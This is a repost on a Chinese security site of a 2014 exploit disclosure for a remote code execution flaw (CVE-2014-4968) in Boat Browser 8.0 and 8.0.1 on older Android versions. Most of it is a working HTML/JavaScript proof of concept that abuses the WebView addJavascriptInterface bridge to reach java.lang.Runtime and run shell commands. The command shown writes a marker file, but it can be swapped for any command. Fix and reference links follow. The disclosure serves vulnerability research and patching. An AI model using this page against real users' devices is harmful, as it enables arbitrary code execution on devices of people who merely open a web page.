首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 Boat Browser 8.0 and 8.0.1 - Remote Code Execution Vulnerability 来源：https://twitter.com/c0otlass 作者：c0otlass 发布时间：2014-07-17   <!-- .:: Remote code execution vulnerability in Boat Browser ::. credit: c0otlass social contact: https://twitter.com/c0otlass mail: c0otlass@gmail.com CVE reserved : 2014-4968 time of discovery:  July 14, 2014 Browser Official site:http://www.boatmob.com/ Browser download link:https://play.google.com/store/apps/details?id=com.boatbrowser.free&hl=en version Affected : In  8.0 and 8.0.1 tested , Android 3.0 through 4.1.x Risk rate: High vulnerability Description impact: The WebView class and  use of the WebView.addJavascriptInterface method has vulnerability which cause remote code in html page run in android device a related issue to CVE-2012-6636 proof of concept: //..............................................poc.hmtl............................................ --> <!DOCTYPE html> <html> <head> <meta charset="UFT-8"> <title>CreatMalTxt POC - WebView</title> <script> var obj; function TestVulnerability() { temp="not"; var myObject = window; for (var name in myObject) { if (myObject.hasOwnProperty(name)) { try { temp=myObject[name].getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null); } catch(e) { } } } if(temp=="not") { document.getElementById("log").innerHTML="this browser has been patched"; } else{ document.getElementById("log").innerHTML = "This browser is exploitabale" + "<br>" + " the poc file hase been created in sdcard ...<br>" ; document.getElementById("log").innerHTML +=  "we could see proccess information"+ temp.exec(['/system/bin/sh','-c','echo \"mwr\" > /mnt/sdcard/mwr.txt']); } } </script> </head> <body > <h3>CreatMalTxt POC</h3> <input value="Test Vulnerability"  type="button"  onclick="TestVulnerability();" /> <div id="log"></div> </body> </html> <!-- Solution: https://labs.mwrinfosecurity.com/advisories/2013/09/24/webview-addjavascriptinterface-remote-code-execution/ http://www.programering.com/a/MDM3YzMwATc.html https://www.securecoding.cert.org/confluence/pages/viewpage.action?pageId=129859614 References: http://blog.trustlook.com/2013/09/04/alert-android-webview-addjavascriptinterface-code-execution-vulnerability/ https://labs.mwrinfosecurity.com/blog/2012/04/23/adventures-with-android-webviews/ http://50.56.33.56/blog/?p=314 https://labs.mwrinfosecurity.com/advisories/2013/09/24/webview-addjavascriptinterface-remote-code-execution/ https://github.com/mwrlabs/drozer/blob/bcadf5c3fd08c4becf84ed34302a41d7b5e9db63/src/drozer/modules/exploit/mitm/addJavaScriptInterface.py -->   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Wordpress WPTouch Authenticate ·Node Browserify 4.2.0 - Remote ·Browserify 4.2.0 Remote Comman ·NTP Amplification Denial Of Se ·Oracle VirtualBox Guest Additi ·ACME micro_httpd - Denial of S ·Elipse E3 Scada PLC Denial Of ·OpenVAS Manager 4.0 - Authenti ·HP Data protector manager 8.10 ·IBM GCM16/32 1.20.0.22575 - Mu ·D-Link info.cgi POST Request B ·Raritan PowerIQ 4.1.0 - SQL In   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved